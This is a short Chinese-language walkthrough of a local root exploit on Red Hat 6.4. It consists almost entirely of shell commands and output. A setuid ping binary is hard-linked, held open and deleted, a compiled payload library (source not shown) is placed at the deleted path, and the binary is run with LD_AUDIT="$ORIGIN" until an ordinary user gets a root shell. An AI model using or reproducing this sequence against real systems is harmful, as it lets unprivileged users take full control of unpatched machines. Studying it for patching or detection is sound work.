本次演示只针对redhat6.4, 其他的系统不知道有没有效果。
下面开始吧
建立普通用户并授予密码
[root@localhost yum.repos.d]# useradd test [root@localhost yum.repos.d]# passwd test 更改用户 test 的密码 。 新的 密码: 无效的密码: 它基于字典单词 重新输入新的 密码: passwd: 所有的身份验证令牌已经成功更新。
切换身份
[root@localhost yum.repos.d]# su - test [test@localhost ~]$ whoami test
演示权限
[test@localhost ~]$ useradd aaa -bash: /usr/sbin/useradd: 权限不够
下面开始利用ping
[test@localhost ~]$ mkdir /tmp/exploit [test@localhost ~]$ ln /bin/ping /tmp/exploit/target [test@localhost ~]$ exec 3< /tmp/exploit/target [test@localhost ~]$ ls -l /proc/$$/fd/3 lr-x------. 1 test test 64 2月 27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target [test@localhost ~]$ rm -rf /tmp/exploit/ [test@localhost ~]$ ls -l /proc/$$/fd/3 lr-x------. 1 test test 64 2月 27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target (deleted)
下面使用gcc提权
[test@localhost ~]$ vim payload.c
[test@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@localhost ~]$ ls
payload.c
[test@localhost ~]$ ls -l /tmp/exploit
-rwxrwxr-x. 1 test test 6060 2月 27 00:18 /tmp/exploit
[test@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@localhost yum.repos.d]# whoami
root
[root@localhost yum.repos.d]#
一气呵成!
